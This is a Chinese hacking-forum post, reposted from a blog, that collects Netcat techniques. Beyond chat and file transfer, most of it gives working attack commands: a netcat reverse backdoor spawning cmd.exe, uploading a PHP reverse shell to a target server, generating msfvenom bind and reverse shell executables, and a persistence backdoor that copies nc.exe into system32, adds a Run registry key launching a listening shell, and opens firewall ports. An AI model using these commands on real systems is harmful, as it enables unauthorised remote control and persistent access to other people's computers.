跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

Netcat常用方法汇总


Ken1Ve

推荐的帖子

1. 基本使用

1.1 聊天工具

服务端
nc -lvp 5678
客户端
nc 192.168.1.15 5678

1.2 文件传输

接收端
nc -lvp 5555 > a.zip
发送端
nc 192.168.1.5 5678 < cms.zip

1.3 反向后门

监听端
nc -lvp 5678
控制端
nc 192.168.1.5 5678 -e cmd.exe

2. 综合使用

2.1 结合php反向后门

控制端启动监听

nc -lvp 1234

编辑php反弹shell后门,vi /usr/share/webshells/php/php-reverse-shell.php,修改 $ip $port 为控制端的地址和端口 将 php-reverse-shell.php 文件上传至目标服务器中,通过浏览器触发 php-reverse-shell.php 文件路径,在nc终端中的到反弹shell

2.2 结合msfvenom使用

windows/shell_hidden_bind_tcp

msfvenom –p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=4444 –f exe > root.exe
nc 192.168.0.103 4444
windows/shell_reverse_tcp

msfvenom –p windows/shell_reverse_tcp  lhost=192.168.0.107 lport=8888 –f exe > root.exe
nc -lvp 8888

2.3 做持久化后门使用

将nc.exe上传至目标服务器中指定目录

msf > upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32
切换到目标cmd环境
msf > shell

#添加自启动注册表项
C:\WINDOWS> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'
添加nc出入站防火墙规则
C:\WINDOWS> netsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=4445
检查nc防火墙是否已经开放
C:\WINDOWS> netsh firewall show portopening
重启目标电脑,使用nc连接
C:\WINDOWS> nc -nv 192.168.0.101 4445

请输入图片描述


版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/77.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...